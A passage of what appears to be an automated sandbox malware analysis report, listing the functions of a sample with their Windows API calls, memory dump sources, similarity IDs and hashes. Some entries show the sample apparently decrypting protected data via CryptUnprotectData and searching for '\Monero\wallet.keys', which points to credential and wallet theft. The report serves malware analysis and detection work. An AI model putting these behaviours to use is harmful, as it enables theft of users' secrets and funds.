                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWide
                          • String ID:
                          • API String ID: 123533781-0
                          • Opcode ID: e20d370372cec9a58273670e078aadf6633f383375cda93c3efeb955fbf92b68
                          • Instruction ID: cebb62410cfea2538711ed6d0cd616dd7af24bf75db97c6be3365a8bc6e3f309
                          • Opcode Fuzzy Hash: e20d370372cec9a58273670e078aadf6633f383375cda93c3efeb955fbf92b68
                          • Instruction Fuzzy Hash: 9041EA70A40A189FDB24DB58CC95B9BB7B5BB48702F4082D9E608E72D0D7B16EC5CF50
                          Function 00BF9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00BF9B84
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00BF9BA3
                          • LocalFree.KERNEL32(?), ref: 00BF9BD3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: d24a32f628bdfcd943ebc37290def93a51a3d58be5152d56ea720b899ce89ba6
                          • Instruction ID: e2fc5720bafc134c222db821096c5ea2e5a42e1a06e0e1b9c19600d405ed3d23
                          • Opcode Fuzzy Hash: d24a32f628bdfcd943ebc37290def93a51a3d58be5152d56ea720b899ce89ba6
                          • Instruction Fuzzy Hash: 4B11F7B8A00209EFCB04DF95D989AAEB7F5FF88300F1045A8E915A7350D770AE54CFA1
                          Function 00FB8316 Relevance: 4.1, Strings: 2, Instructions: 1565COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: a~<$|>~
                          • API String ID: 0-3362253586
                          • Opcode ID: 6d6a57bd8d06a2b3389c409931d5e9037a78756498867a0d082f38d7f48d173f
                          • Instruction ID: ff08e40ecf68547cc002d3394812187625d98a9769e8e31b9509bd98291f41b7
                          • Opcode Fuzzy Hash: 6d6a57bd8d06a2b3389c409931d5e9037a78756498867a0d082f38d7f48d173f
                          • Instruction Fuzzy Hash: D4B2D4B360C204AFE304AE29DC8567AFBE9EF94720F16893DEAC5C3740E63558418797
                          Function 00EAB7D3 Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: OZj9$Y[_.
                          • API String ID: 0-741291601
                          • Opcode ID: 8bba37f8a1eb65af586c43ab59f324d69b03898ef8babfa645f527100cd081ab
                          • Instruction ID: 0974e84061c5d1899884e39a6b3380f1c69b19cc0a94de7f39e7a57311ac13c1
                          • Opcode Fuzzy Hash: 8bba37f8a1eb65af586c43ab59f324d69b03898ef8babfa645f527100cd081ab
                          • Instruction Fuzzy Hash: B561D7F391C2109FF7086E18EC8577AB7E5EB94320F16493DEAC993780DA795C018687
                          Function 00EEEAA3 Relevance: 2.7, Strings: 2, Instructions: 191COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: asZ~$}5?
                          • API String ID: 0-51315039
                          • Opcode ID: e161e931246179e8692fa030a67ee247441eb31427a2b59424a99a1fbb111b3b
                          • Instruction ID: 784051cdbe729694567e5f5a9f8013030989af7ba4ab5923ad570ba43e44df04
                          • Opcode Fuzzy Hash: e161e931246179e8692fa030a67ee247441eb31427a2b59424a99a1fbb111b3b
                          • Instruction Fuzzy Hash: DC5135F3F152105BE300592AED8476BFADB9BD4320F2B863DDB9893788D9784C064296
                          Function 00BFF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C0A740: lstrcpy.KERNEL32(00C10E17,00000000), ref: 00C0A788
                            • Part of subcall function 00C0A920: lstrcpy.KERNEL32(00000000,?), ref: 00C0A972
                            • Part of subcall function 00C0A920: lstrcat.KERNEL32(00000000), ref: 00C0A982
                            • Part of subcall function 00C0A9B0: lstrlen.KERNEL32(?,006E8B30,?,\Monero\wallet.keys,00C10E17), ref: 00C0A9C5
                            • Part of subcall function 00C0A9B0: lstrcpy.KERNEL32(00000000), ref: 00C0AA04
                            • Part of subcall function 00C0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C0AA12
                            • Part of subcall function 00C0A8A0: lstrcpy.KERNEL32(?,00C10E17), ref: 00C0A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C115B8,00C10D96), ref: 00BFF71E
                          • StrCmpCA.SHLWAPI(?,00C115BC), ref: 00BFF76F
                          • StrCmpCA.SHLWAPI(?,00C115C0), ref: 00BFF785
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00BFFAB1
                          • FindClose.KERNEL32(000000FF), ref: 00BFFAC3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID:
                          • API String ID: 3334442632-0
                          • Opcode ID: b9074f8e3ae7780192119064c8e6afab13b02e09f91f986b4a5044bca9382748
                          • Instruction ID: cfe7fcee50787ce2f4dd7ab347e411a9827ace9dac3a8c327bd668f56a78f198
                          • Opcode Fuzzy Hash: b9074f8e3ae7780192119064c8e6afab13b02e09f91f986b4a5044bca9382748
                          • Instruction Fuzzy Hash: 1A11547181064D9BDB14FBA0DC55EED7378AF11300F5087A9A51A574D2EF302B4ADB92
                          Function 00F3A233 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: j5
                          • API String ID: 0-2515281012
                          • Opcode ID: 7b80ed9dc83d41aed76422bb813bb8bd1d6cff8922366e15b42b9be0c9a58bb6
                          • Instruction ID: 123194474b522fc5e0d2f8cbfbe2bb8dcc2b398833abaf9c228e6faa1addbf36
                          • Opcode Fuzzy Hash: 7b80ed9dc83d41aed76422bb813bb8bd1d6cff8922366e15b42b9be0c9a58bb6
                          • Instruction Fuzzy Hash: 016139B3A082145FE3046E2DDC4477BFBD6EBD4720F1A893EEAC987780E97558058686
                          Function 00ED03EF Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 1mo_
                          • API String ID: 0-812458918
                          • Opcode ID: 34320cc994e4a6c66907d4a1292ef63f81ddd98d28bef5daad538407d2b42e7f
                          • Instruction ID: 416d5ba17d787749756fc0bc8b9536eed32859dea238a1c732709359e4d5d50d
                          • Opcode Fuzzy Hash: 34320cc994e4a6c66907d4a1292ef63f81ddd98d28bef5daad538407d2b42e7f
                          • Instruction Fuzzy Hash: 6261CFF3E183149BE3046E29EC4976AB7D6DBD4720F1E863DDA84C7784F9399C058285
                          Function 0106B2D0 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: aEo
                          • API String ID: 0-771878426
                          • Opcode ID: 5129736af3666108b5e8a0703943461afaf692a788f6d8f3b5078244c7d9af18
                          • Instruction ID: eb26286b79e701d3e6cfa7bcdfc43fb7bb0275a9ae1e858836b6a0b2949bae64
                          • Opcode Fuzzy Hash: 5129736af3666108b5e8a0703943461afaf692a788f6d8f3b5078244c7d9af18
                          • Instruction Fuzzy Hash: D551D6F370C600EFD3045A29DC8563EB7EEEBD4620F29C92EE5C7C6654EA3188018653
                          Function 00E97FD1 Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7Akv
                          • API String ID: 0-42966678
                          • Opcode ID: bdc4a68fd39859dbef97d8b02ef4bcfcf8d79f2acb29059da7e7f76a5f72e7b8
                          • Instruction ID: 5b0112414dfe9216c13b5219358205e4e8d587a6c58650d492ebb069a66c4d65
                          • Opcode Fuzzy Hash: bdc4a68fd39859dbef97d8b02ef4bcfcf8d79f2acb29059da7e7f76a5f72e7b8
                          • Instruction Fuzzy Hash: 9E5104F3E081245BF350A929DC097AAB6D9DBD4360F1B853DDEC8D3784E87A9D0582C6
                          Function 010A867C Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113580402.00000000010DB000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113701440.000000000126B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113719645.000000000126C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_bf0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: -}
                          • API String ID: 0-1227557316
                          • Opcode ID: 04046e41e1ca3e73e06080f6a3f15c2db4b0f467fa3c002624836fbf4a18c954
                          • Instruction ID: 028919c841db270327081c0eafdec9b37a5d3d50e534a3c7154def372ad76719
                          • Opcode Fuzzy Hash: 04046e41e1ca3e73e06080f6a3f15c2db4b0f467fa3c002624836fbf4a18c954
                          • Instruction Fuzzy Hash: 31415BF390C700DFD3041A94BC9567EBBD8EB086A2F95853FE6C296340F57188108796
                          Function 00FEA62A Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2113294840.0000000000FC8000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                          • Associated: 00000000.00000002.2113098156.0000000000BF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000BF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000CD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113115231.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2113294840.00000000010DA000.00000040.00000001.01000000.00000003.sdmpDownload File
